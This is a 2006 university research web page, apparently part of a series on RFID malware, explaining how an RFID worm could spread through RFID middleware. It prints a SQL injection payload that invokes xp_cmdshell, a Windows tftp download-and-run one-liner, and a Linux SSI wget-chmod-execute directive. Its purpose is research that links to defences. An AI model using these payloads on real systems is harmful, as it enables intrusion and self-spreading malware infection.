Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

How to Write an RFID Worm

A worm is a program that self-propagates across a network, exploiting security flaws in widely-used services. A worm is distinguishable from a virus in that a worm does not require any user activity to propagate. Worms usually have a payload, which performs activities ranging from deleting files, to sending information via email, to installing software patches. One of the most common payloads for a worm is to install a backdoor in the infected computer, which grants hackers easy return access to that computer system in the future.

An RFID worm propagates by exploiting security flaws in online RFID services. RFID worms do not necessarily require users to do anything (like scanning RFID tags) to propagate, although they will also happily spread via RFID tags, if given the opportunity.


RFID tags are generally too small to contain an entire worm. Therefore the tag will contain only enough of the worm to enable it to download the rest from a computer connected to the internet.

The RFID tag can either include binary code to download and execute the worm, or shell commands which do the same. Shell commands generally require less space than binary code and they are also more portable. Examples of what can be done using shell commands can be found here. However, some weaknesses may only allow binary code to be executed.

Worms may target any part of the RFID middleware to propagate. Some database systems provide SQL commands that execute shell commands on the database server. These commands can be abused to download and execute the worm. An example for SQL Server is shown in Example  1.
Apples'; EXEC Master..xp_cmdshell 'shell commands';--
Example  1 - Executing shell commands using SQL Server
The first part of the exploit (before the semicolon) performs SQL injection. It terminates the current query and starts a new query. The second part of the query uses SQL Server's xp_cmdshell stored procedure to execute shell commands. The final part of the query starts a SQL comment, which makes sure any remaining SQL inserted by the middleware is ignored, to prevent errors being logged.

An example of the shell commands that a worm would execute is shown in Example  2.

cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe
Example  2 - Downloading and executing a worm on Windows
These shell commands download the worm into the windows temporary directory using the tftp utility, which comes standard with windows. After the worm has been downloaded, it is executed.

Web-based components may also be susceptible. Server-side includes may allow shell commands to be executed, which can be abused to download and execute the worm in the same way.
When using SSI on Linux, the code to download and execute the worm might look like this:

<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->
Example  3 - Downloading and executing a worm on Linux using SSI
These shell commands perform the same function as the previous windows example, in this case using the wget utility. Since Linux requires programs to have an executable flag set, an extra statement is included to enable this flag.

Any part of the middleware that is written in C or C++ may be susceptible to buffer overflows, which can be used to inject binary code that handles propagation. We have not developed a worm using buffer overflows, but the buffer overflow example that executes shell commands could be used to create a worm, by having it execute one of the previous shell commands.

Previous How to Write an RFID Virus
Up RFID Viruses and Worms
How to Defend against RFID Malware Next

Last modified: Thursday, 02 March 2006 21:27, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.